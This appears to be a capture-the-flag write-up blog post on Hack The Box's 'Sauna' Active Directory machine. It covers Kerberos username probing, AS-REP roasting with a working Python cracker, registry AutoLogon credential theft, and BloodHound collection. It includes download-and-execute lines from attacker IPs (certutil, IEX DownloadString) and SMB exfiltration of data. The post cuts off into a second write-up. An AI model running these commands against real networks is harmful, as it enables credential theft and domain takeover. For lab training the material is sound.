Month: February 2020
htb-sauna-nl
As always we start with an nmap scan:
# Nmap 7.80 scan initiated Tue Feb 18 03:17:50 2020 as: nmap -A -oN allports 10.10.10.175
Nmap scan report for 10.10.10.175
Host is up (0.076s latency).
Not shown: 988 filtered ports
PORT     STATE SERVICE       VERSION
53/tcp   open  domain?
| fingerprint-strings:
|   DNSVersionBindReqTCP:
|     version
|_    bind
80/tcp   open  http          Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Egotistical Bank :: Home
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2020-02-18 16:19:56Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=2/18%Time=5E4B9DC1%P=x86_64-pc-linux-gnu%r(DNSVersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\x04bind\0\0\x10\0\x03");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 2 hops
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 8h01m51s
| smb2-security-mode:
|   2.02:
|_    Message signing enabled and required
| smb2-time:
|   date: 2020-02-18T16:22:19
|_  start_date: N/A

TRACEROUTE (using port 445/tcp)
HOP RTT       ADDRESS
1   100.30 ms 10.10.16.1
2   100.29 ms 10.10.10.175

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Feb 18 03:23:06 2020 -- 1 IP address (1 host up) scanned in 317.70 seconds
The most interesting ports are HTTP (80), Kerberos (88) and LDAP (389/3268), plus WinRM (5985), which is not in nmap's default top-1000 port list and therefore does not appear above; a full-port scan (-p-) finds it. Also note the 8 hour clock skew: once you authenticate with Kerberos (getTGT.py, Kerberos logins), requests whose timestamp is more than five minutes off the DC's time are rejected, so sync your clock first (e.g. ntpdate 10.10.10.175). AS-REP roasting of accounts without pre-authentication is not affected by the skew.
User
I enumerated the LDAP port, first with an anonymous base query for the naming contexts:
┌─[puck@parrot-lt]─[~/htb/sauna]
└──╼ $ldapsearch -x -H 10.10.10.175 -s base namingcontexts
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts
#
#
dn:
namingcontexts: DC=EGOTISTICAL-BANK,DC=LOCAL
namingcontexts: CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
namingcontexts: CN=Schema,CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
namingcontexts: DC=DomainDnsZones,DC=EGOTISTICAL-BANK,DC=LOCAL
namingcontexts: DC=ForestDnsZones,DC=EGOTISTICAL-BANK,DC=LOCAL
# search result
search: 2
result: 0 Success
# numResponses: 2
# numEntries: 1
┌─[puck@parrot-lt]─[~/htb/sauna]
└──╼ $
Next, an anonymous subtree search of the domain naming context. Dumped to a file it is mostly schema noise, but one user object stands out:
root@kali:~/htb/sauna# ldapsearch -h 10.10.10.175 -p 389 -x -b "dc=EGOTISTICAL-BANK,dc=LOCAL" > ldaplogall.txt
root@kali:~/htb/sauna# ls
allports  ldaplogall.txt
# Hugo Smith, EGOTISTICAL-BANK.LOCAL
dn: CN=Hugo Smith,DC=EGOTISTICAL-BANK,DC=LOCAL
The same search returns far more once you can bind with credentials; the post's later run used hsmith's account:
root@kali:~/htb/sauna# ldapsearch -x -H ldap://10.10.10.175 -D 'EGOTISTICAL-BANK\hsmith' -w 'Thestrokes23' -b "dc=EGOTISTICAL-BANK,dc=LOCAL" > ldaplogall.txt
Now we have a possible username: "Hugo Smith".
GetNPUsers.py doubles as a username check even without credentials: the KDC answers an AS-REQ for a non-existent principal with KDC_ERR_C_PRINCIPAL_UNKNOWN, while an existing account that still requires pre-authentication gets a different error (Impacket reports it as "doesn't have UF_DONT_REQUIRE_PREAUTH set"). The full name as-is does not exist, so I tried the usual naming conventions and found the one that does: hsmith.
Variations I tried (one per line in hugosmith.txt):
Hugo Smith
HugoSmith
hugo.smith
h.smith
hsmith
smithh
smith.h
smith.hugo
smithhugo
smith hugo
The final "invalid principal syntax" line in the output comes from an entry that is not a valid principal name at all and is rejected before any request is sent.
Found user:
root@kali:~/htb/sauna# GetNPUsers.py -dc-ip 10.10.10.175 EGOTISTICAL-BANK.LOCAL/ -usersfile hugosmith.txt
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] User hsmith doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] invalid principal syntax
So, now we have a valid user “ hsmith ” but no password…
Time to look at the web server. It only serves a few static HTML pages, but some of them contain employee names (screenshot not reproduced here).
Since we now know the username format (first initial followed by the surname), let's check these candidates:
fsmith scoins sdriver btaylor hbear
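The candidate-generation and triage steps above, as an added example (my own code, not from the original post): it produces the common first/last-name username formats for a full name and sorts GetNPUsers.py output lines into "exists", "AS-REP roastable" and "unknown principal". The name formats, the parsing and the sample output lines are my own constructions.

```python
"""Kerberos username discovery: candidate generation plus triage of GetNPUsers.py output.

Added example, not from the original post. The KDC answers an AS-REQ for a
non-existent principal with KDC_ERR_C_PRINCIPAL_UNKNOWN, while an existing
account that still requires pre-authentication gets KDC_ERR_PREAUTH_REQUIRED
(Impacket reports it as "doesn't have UF_DONT_REQUIRE_PREAUTH set"), so the
error itself confirms which usernames exist, no password needed.
"""
import re


def candidate_usernames(full_name: str) -> list[str]:
    """Common AD naming conventions for 'First Last', most likely first (assumed order).
    Nothing containing a space is generated: Kerberos rejects it as an invalid principal."""
    parts = full_name.lower().split()
    if len(parts) < 2:
        return parts
    first, last = parts[0], parts[-1]
    cands = [
        first + last, first[0] + last, first + "." + last, first[0] + "." + last,
        last + first[0], last + "." + first[0], last + "." + first, last + first,
        first + last[0], first, last,
    ]
    return list(dict.fromkeys(cands))  # dedupe while keeping order


# What GetNPUsers.py prints per name, by outcome.
_UNKNOWN = re.compile(r"KDC_ERR_C_PRINCIPAL_UNKNOWN")
_PREAUTH = re.compile(r"User (\S+) doesn't have UF_DONT_REQUIRE_PREAUTH set")
_ROASTABLE = re.compile(r"^\$krb5asrep\$23\$([^@]+)@")


def triage_getnpusers(output_lines) -> tuple[dict[str, str], int]:
    """Return ({username: verdict}, number of unknown names).
    The unknown-principal line does not echo the name, so only a count is possible for it."""
    verdicts, unknown = {}, 0
    for line in output_lines:
        line = line.strip()
        if _UNKNOWN.search(line):
            unknown += 1
        elif (m := _PREAUTH.search(line)):
            verdicts[m.group(1)] = "exists, pre-auth required"
        elif (m := _ROASTABLE.match(line)):
            verdicts[m.group(1)] = "exists, AS-REP roastable"
    return verdicts, unknown


# Constructed sample modelled on the post's run: two real accounts, three misses.
SAMPLE_OUTPUT = [
    "Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation",
    "[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)",
    "[-] User hsmith doesn't have UF_DONT_REQUIRE_PREAUTH set",
    "[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)",
    "$krb5asrep$23$FSmith@EGOTISTICAL-BANK.LOCAL:0011223344556677889900aabbccddee$00ff",
    "[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)",
    "[-] invalid principal syntax",
]

if __name__ == "__main__":
    print("Hugo Smith ->", " ".join(candidate_usernames("Hugo Smith")))
    print(triage_getnpusers(SAMPLE_OUTPUT))
```

Feed the generated list to GetNPUsers.py -usersfile (or to kerbrute userenum, which does the same probe faster) and keep the names that did not come back as unknown; the roastable ones go straight to the cracker.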
The user fsmith has pre-authentication disabled (UF_DONT_REQUIRE_PREAUTH), so the KDC hands out an AS-REP whose enc-part is encrypted under a key derived from the user's password. That blob is the crackable "hash" Impacket prints:
root@kali:~/htb/sauna# GetNPUsers.py -dc-ip 10.10.10.175 -no-pass EGOTISTICAL-BANK.LOCAL/FSmith
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation
[*] Getting TGT for FSmith
$krb5asrep$23$FSmith@EGOTISTICAL-BANK.LOCAL:cb52c62c6143cf4cc4c71dccf64756f5$...
So, let's crack it with hashcat or john and rockyou. hashcat mode 18200 is "Kerberos 5, etype 23, AS-REP"; --force only silences the warning about the pocl CPU backend and is otherwise unnecessary. The hash in this run differs from the one above because it was requested again later: every AS-REP carries a fresh random confounder, so each capture looks different but cracks to the same password.
┌─[puck@parrot-lt]─[~/htb/sauna]
└──╼ $hashcat -m 18200 ego.hash /usr/share/wordlists/rockyou.txt --force
hashcat (v6.1.1) starting...

You have enabled --force to bypass dangerous warnings and errors!
This can hide serious problems and should only be done when debugging.
Do not report hashcat issues encountered when using --force.

OpenCL API (OpenCL 1.2 pocl 1.6, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
=============================================================================================================================
* Device #1: pthread-Intel(R) Core(TM) i5-10210U CPU @ 1.60GHz, 5690/5754 MB (2048 MB allocatable), 8MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

ATTENTION! Pure (unoptimized) backend kernels selected.
Using pure kernels enables cracking longer passwords but for the price of drastically reduced performance.
If you want to switch to optimized backend kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

Host memory required for this attack: 204 MB

Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 1 sec

$krb5asrep$23$FSmith@EGOTISTICAL-BANK.LOCAL:bee59333cd5943cd85e7e49722df567e$...:Thestrokes23

Session..........: hashcat
Status...........: Cracked
Hash.Name........: Kerberos 5, etype 23, AS-REP
Hash.Target......: $krb5asrep$23$FSmith@EGOTISTICAL-BANK.LOCAL:bee5933...0e3e14
Time.Started.....: Sat Sep 24 20:49:12 2022, (12 secs)
Time.Estimated...: Sat Sep 24 20:49:24 2022, (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   881.0 kH/s (7.26ms) @ Accel:32 Loops:1 Thr:64 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 10551296/14344385 (73.56%)
Rejected.........: 0/10551296 (0.00%)
Restore.Point....: 10534912/14344385 (73.44%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: Tioncurtis23 -> TUGGIE

Started: Sat Sep 24 20:48:53 2022
Stopped: Sat Sep 24 20:49:25 2022
┌─[puck@parrot-lt]─[~/htb/sauna]
root@kali:~/htb/sauna# john ego.hash -wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 SSE2 4x])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Thestrokes23 ($krb5asrep$23$FSmith@EGOTISTICAL-BANK.LOCAL)
1g 0:00:00:33 DONE (2020-02-18 04:48) 0.02995g/s 315720p/s 315720c/s 315720C/s Thines..Theredwolf_120691
Use the "--show" option to display all of the cracked passwords reliably
Session completed
Credentials found: fsmith:Thestrokes23
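What the cracker is actually doing, as an added example (my own code, not the post's): the KDC encrypts the AS-REP enc-part with RC4-HMAC (etype 23) under the user's NT hash, and the $krb5asrep$23$ line is just that checksum and ciphertext. Testing a candidate means deriving the key from the guess, decrypting and checking the HMAC, which is all hashcat mode 18200 does per guess. The sample hash is constructed locally from the password the post recovered (a real capture differs because of the random confounder); the plaintext, confounder and wordlist are made up, and MD4 is written out because hashlib on OpenSSL 3 builds often lacks it.

```python
"""Why an AS-REP hash cracks offline: the etype-23 (RC4-HMAC) enc-part, reimplemented.

Added example, not code from the original post. The KDC encrypts the AS-REP
enc-part under a key derived from the user's password (the NT hash for
etype 23), so the checksum||ciphertext blob GetNPUsers.py prints can be tested
against candidates locally, which is what hashcat -m 18200 does per guess.
The plaintext, confounder and wordlist below are constructed.
"""
import hmac
import struct

MASK = 0xFFFFFFFF
AS_REP_USAGE = 8  # RFC 4757: RC4-HMAC uses key-usage 8 for the AS-REP enc-part


def _rotl(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & MASK


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4 (little-endian words, 64-byte blocks); hashlib may not offer it."""
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg)) % 64)
    msg += struct.pack("<Q", len(data) * 8)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = (  # (mix function, message-word order, per-step shifts, additive constant)
        (lambda x, y, z: (x & y) | (~x & z), range(16), (3, 7, 11, 19), 0),
        (lambda x, y, z: (x & y) | (x & z) | (y & z),
         (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13), 0x5A827999),
        (lambda x, y, z: x ^ y ^ z,
         (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15), 0x6ED9EBA1),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = state
        for fn, order, shifts, k in rounds:
            for i, w in enumerate(order):
                # each step rewrites one register; rotating (a,b,c,d) walks a -> d -> c -> b
                a = _rotl((a + fn(b, c, d) + x[w] + k) & MASK, shifts[i % 4])
                a, b, c, d = d, a, b, c
        state = [(s + v) & MASK for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> bytes:
    return md4(password.encode("utf-16-le"))


def rc4(key: bytes, data: bytes) -> bytes:
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def _k1(nt: bytes) -> bytes:
    return hmac.new(nt, struct.pack("<I", AS_REP_USAGE), "md5").digest()


def asrep_encrypt(password: str, plaintext: bytes, confounder: bytes) -> tuple[bytes, bytes]:
    """The KDC side (RFC 4757 section 6): returns (checksum, ciphertext) for the enc-part."""
    k1 = _k1(nt_hash(password))
    data = confounder + plaintext  # an 8-byte random confounder prefixes the data
    checksum = hmac.new(k1, data, "md5").digest()
    k3 = hmac.new(k1, checksum, "md5").digest()
    return checksum, rc4(k3, data)


def asrep_hash_line(user: str, realm: str, checksum: bytes, ciphertext: bytes) -> str:
    """Impacket / hashcat 18200 format: $krb5asrep$23$user@REALM:checksum$ciphertext."""
    return f"$krb5asrep$23${user}@{realm}:{checksum.hex()}${ciphertext.hex()}"


def asrep_check(hash_line: str, candidate: str) -> bool:
    """One cracker step: derive K3 from the candidate, decrypt, verify the HMAC."""
    _, blob = hash_line.split(":", 1)
    checksum_hex, ct_hex = blob.split("$")
    checksum, ct = bytes.fromhex(checksum_hex), bytes.fromhex(ct_hex)
    k1 = _k1(nt_hash(candidate))
    k3 = hmac.new(k1, checksum, "md5").digest()
    data = rc4(k3, ct)
    return hmac.compare_digest(hmac.new(k1, data, "md5").digest(), checksum)


def crack(hash_line: str, wordlist):
    return next((w for w in wordlist if asrep_check(hash_line, w)), None)


# Constructed sample: an AS-REP for FSmith encrypted under the password the post recovered.
SAMPLE_HASH = asrep_hash_line(
    "FSmith", "EGOTISTICAL-BANK.LOCAL",
    *asrep_encrypt("Thestrokes23", b"constructed EncASRepPart, not real ASN.1", b"\x00" * 8))
WORDLIST = ["password", "Summer2020", "Thestrokes23", "Moneymakestheworldgoround!"]

if __name__ == "__main__":
    print(SAMPLE_HASH)
    print("cracked:", crack(SAMPLE_HASH, WORDLIST))
```

The takeaway for defenders is in asrep_check: one MD4 and three HMAC-MD5 per guess and no salt beyond the public checksum, so the only real defence is not setting "Do not require Kerberos preauthentication" (or giving such accounts long random passwords). AES etypes (17/18) replace the NT hash with a PBKDF2-derived key and are far slower to test.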
Now, just connect via WinRM and grab the user flag (EGOTISTICAL-BANK.LOCAL resolves via /etc/hosts):
root@kali:/opt/evil-winrm# ruby evil-winrm.rb -u fsmith -p "Thestrokes23" -i EGOTISTICAL-BANK.LOCAL
*Evil-WinRM* PS C:\Users\FSmith\desktop> type user.txt
1b5520b98d97cf17f24122a55baf70cf
*Evil-WinRM* PS C:\Users\FSmith\desktop> certutil -urlcache -split -f http://10.10.14.10/WINPEAS.exe C:\Users\FSmith\Documents\WINPEAS.exe
Root
I started enumerating the box with winPEAS (the systeminfo and userinfo checks):
*Evil-WinRM* PS C:\Users\FSmith\Documents> ./winpeas.exe systeminfo userinfo
ANSI color bit for Windows is not set. If you are execcuting this from a Windows terminal inside the host you should run 'REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD
Creating Dynamic lists, this could take a while, please wait...
- Checking if domain...
- Getting Win32_UserAccount info...
--snip--
[+] RDP Sessions(T1087&T1033)
Not Found

[+] Ever logged users(T1087&T1033)
[X] Exception: System.Management.ManagementException: Access denied
at System.Management.ThreadDispatch.Start()
at System.Management.ManagementScope.Initialize()
at System.Management.ManagementObjectSearcher.Initialize()
at System.Management.ManagementObjectSearcher.Get()
at winPEAS.UserInfo.GetEverLoggedUsers()
Not Found

[+] Looking for AutoLogon credentials(T1012)
Some AutoLogon credentials were found!!
DefaultDomainName : EGOTISTICALBANK
DefaultUserName : EGOTISTICALBANK\svc_loanmanager
DefaultPassword : Moneymakestheworldgoround!
or it can be done manually by querying the Winlogon key, where the AutoLogon values sit next to the shell settings:
*Evil-WinRM* PS C:\Users\FSmith\Documents> REG QUERY "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
    AutoRestartShell    REG_DWORD    0x1
    Background    REG_SZ    0 0 0
    CachedLogonsCount    REG_SZ    10
    DebugServerCommand    REG_SZ    no
    DefaultDomainName    REG_SZ    EGOTISTICALBANK
    DefaultUserName    REG_SZ    EGOTISTICALBANK\svc_loanmanager
    DisableBackButton    REG_DWORD    0x1
    EnableSIHostIntegration    REG_DWORD    0x1
    ForceUnlockLogon    REG_DWORD    0x0
    LegalNoticeCaption    REG_SZ
    LegalNoticeText    REG_SZ
    PasswordExpiryWarning    REG_DWORD    0x5
    PowerdownAfterShutdown    REG_SZ    0
    PreCreateKnownFolders    REG_SZ    {A520A1A4-1780-4FF6-BD18-167343C5AF16}
    ReportBootOk    REG_SZ    1
    Shell    REG_SZ    explorer.exe
    ShellCritical    REG_DWORD    0x0
    ShellInfrastructure    REG_SZ    sihost.exe
    SiHostCritical    REG_DWORD    0x0
    SiHostReadyTimeOut    REG_DWORD    0x0
    SiHostRestartCountLimit    REG_DWORD    0x0
    SiHostRestartTimeGap    REG_DWORD    0x0
    Userinit    REG_SZ    C:\Windows\system32\userinit.exe,
    VMApplet    REG_SZ    SystemPropertiesPerformance.exe /pagefile
    WinStationsDisabled    REG_SZ    0
    scremoveoption    REG_SZ    0
    Disable CAD    REG_DWORD    0x1
    LastLogOffEndTimePerfCounter    REG_QWORD    0x8e3982368
    ShutdownFlags    REG_DWORD    0x80000027
    DisableLockWorkstation    REG_DWORD    0x0
    DefaultPassword    REG_SZ    Moneymakestheworldgoround!

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AlternateShells
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\UserDefaults
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AutoLogonChecked
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey

*Evil-WinRM* PS C:\Users\FSmith\Documents>
winPEAS flagged the credentials in the Winlogon registry key: DefaultUserName/DefaultPassword is an AutoLogon configuration, stored in clear text and readable by any local user.
There isn't a domain user called svc_loanmanager, but there is one called svc_loanmgr (check with net user /domain), and the registry password works for it: svc_loanmgr:Moneymakestheworldgoround!
So you can connect as that account with the password extracted from the registry (session below).
Collecting the domain with SharpHound/BloodHound as svc_loanmgr shows that this account holds the two replication rights on the domain object (GetChanges and GetChangesAll) that DCSync needs, i.e. it can ask the DC to replicate every account's secrets, including the Administrator hash, over the DRS protocol, which is what impacket's secretsdump.py does:
Bloodhound
We can use BloodHound to enumerate and visualise the Active Directory domain and identify attack paths that elevate our domain privileges. The bloodhound-python ingestor collects the data remotely over LDAP and SMB; BloodHound then renders the graph.
sudo apt install bloodhound
sudo pip install bloodhound
bloodhound-python -u svc_loanmgr -p 'Moneymakestheworldgoround!' -d EGOTISTICAL-BANK.LOCAL -ns 10.10.10.175 -c All
Two details that trip people up: the PyPI package is named bloodhound even though the command is bloodhound-python, and the password has to be single-quoted because an unquoted ! triggers bash history expansion.
Start the neo4j server:
neo4j console
Then type bloodhound to open the BloodHound UI. When bloodhound-python has finished, zip the JSON files it wrote and upload the archive in the UI.
root@kali:/opt/evil-winrm# ruby evil-winrm.rb -u svc_loanmgr -p "Moneymakestheworldgoround!" -i EGOTISTICAL-BANK.LOCAL
Info: Starting Evil-WinRM shell v1.6
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> powershell -command "IEX(New-Object Net.WebClient).DownloadString('http://10.10.16.70/SharpHound.ps1'); Invoke-BloodHound -CollectionMethod All -Verbose -LdapUSer 'svc_loanmgr' -LdapPass 'Moneymakestheworldgoround!'"
Initializing BloodHound at 5:42 PM on 2/18/2020
Found usable Domain Controller for EGOTISTICAL-BANK.LOCAL : SAUNA.EGOTISTICAL-BANK.LOCAL
Adding Network Credential to connection
Resolved Collection Methods to Group, LocalAdmin, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets
Building GUID Cache
Starting Enumeration for EGOTISTICAL-BANK.LOCAL
Adding Network Credential to connection
Waiting for enumeration threads to finish
Found usable Domain Controller for EGOTISTICAL-BANK.LOCAL : SAUNA.EGOTISTICAL-BANK.LOCAL
Status: 60 objects enumerated (+60 ∞/s --- Using 83 MB RAM )
Finished enumeration for EGOTISTICAL-BANK.LOCAL in 00:00:00.4511238
0 hosts failed ping. 0 hosts timedout.
Waiting for writer thread to finish
Compressing data to C:\Users\svc_loanmgr\Documents\20200218174244_BloodHound.zip.
You can upload this file directly to the UI.
Finished compressing files!
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> download 20200218174244_BloodHound.zip
Info: Downloading 20200218174244_BloodHound.zip to 20200218174244_BloodHound.zip
Info: Download successful!
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> exit
Info: Exiting with code 0
root@kali:/opt/evil-winrm#
A later run with the SharpHound.exe collector (this build matches BloodHound 4.2):
*Evil-WinRM* PS C:\programdata> .\Sharphound.exe -c all
2022-09-24T18:56:56.9785964-07:00|INFORMATION|This version of SharpHound is compatible with the 4.2 Release of BloodHound
2022-09-24T18:56:57.1192436-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2022-09-24T18:56:57.1506456-07:00|INFORMATION|Initializing SharpHound at 6:56 PM on 9/24/2022
2022-09-24T18:57:09.3379487-07:00|INFORMATION|Flags: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2022-09-24T18:57:09.4786146-07:00|INFORMATION|Beginning LDAP search for EGOTISTICAL-BANK.LOCAL
2022-09-24T18:57:09.5098741-07:00|INFORMATION|Producer has finished, closing LDAP channel
2022-09-24T18:57:09.5098741-07:00|INFORMATION|LDAP channel closed, waiting for consumers
2022-09-24T18:57:39.9005021-07:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 35 MB RAM
2022-09-24T18:58:07.2442001-07:00|INFORMATION|Consumers finished, closing output channel
2022-09-24T18:58:07.2754507-07:00|INFORMATION|Output channel closed, waiting for output task to complete
Closing writers
2022-09-24T18:58:07.3691997-07:00|INFORMATION|Status: 94 objects finished (+94 1.649123)/s -- Using 42 MB RAM
2022-09-24T18:58:07.3691997-07:00|INFORMATION|Enumeration finished in 00:00:57.9016252
2022-09-24T18:58:07.4473475-07:00|INFORMATION|Saving cache with stats: 53 ID to type mappings.
 53 name to SID mappings.
 0 machine sid mappings.
 2 sid to domain mappings.
 0 global catalog mappings.
2022-09-24T18:58:07.4473475-07:00|INFORMATION|SharpHound Enumeration Completed at 6:58 PM on 9/24/2022! Happy Graphing!
*Evil-WinRM* PS C:\programdata> dir *.zip

    Directory: C:\programdata

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         9/24/2022   6:58 PM          11485 20220924185806_BloodHound.zip

*Evil-WinRM* PS C:\programdata> upload 20220924185806_BloodHound.zip
The archive then has to come back to the attacking host. evil-winrm's download command does that (upload goes the other way, from attacker to target); in this session I instead copied it to an SMB share served by impacket-smbserver:
*Evil-WinRM* PS C:\temp> net use \\10.10.14.10\share /u:puck puck
The command completed successfully.
*Evil-WinRM* PS C:\temp> cp 20220924185806_BloodHound.zip \\10.10.14.10\share\
*Evil-WinRM* PS C:\temp>
┌─[✗]─[puck@parrot-lt]─[~/htb/sauna]
└──╼ $sudo impacket-smbserver -username puck -password puck share . -smb2support
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.10.175,49819)
[*] AUTHENTICATE_MESSAGE (\df,SAUNA)
[*] User SAUNA\df authenticated successfully
[*] df:::aaaaaaaaaaaaaaaa:cc698eaf23e930262c688bcc686fffb5:010100000000000000a9108a48d0d801946617735218756000000000010010004d004700790044004d0048006d004800030010004d004700790044004d0048006d0048000200100076005a0052004a0064007a00670058000400100076005a0052004a0064007a00670058000700080000a9108a48d0d80106000400020000000800300030000000000000000000000000210000fcffb479cf1627839a9882b2cc0e3163d00d1e286c75c538f3ed06b8e7187bd80a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e00310030000000000000000000
[*] Connecting Share(1:IPC$)
[*] Connecting Share(2:share)
[*] Disconnecting Share(1:IPC$)
[*] Connecting Share(3:IPC$)
[*] Disconnecting Share(3:IPC$)
htb-ai-nl
Welcome back! Today we are doing the Hack the Box machine – Ai. This is a Linux box with a medium difficulty. Let’s see what’s in store!
As always we kick it off with our nmap scan:
nmap -sC -sV -T4 -p- -oA all_ports 10.10.10.163
Here are our results:
Host is up (0.060s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 6d:16:f4:32:eb:46:ca:37:04:d2:a5:aa:74:ed:ab:fc (RSA)
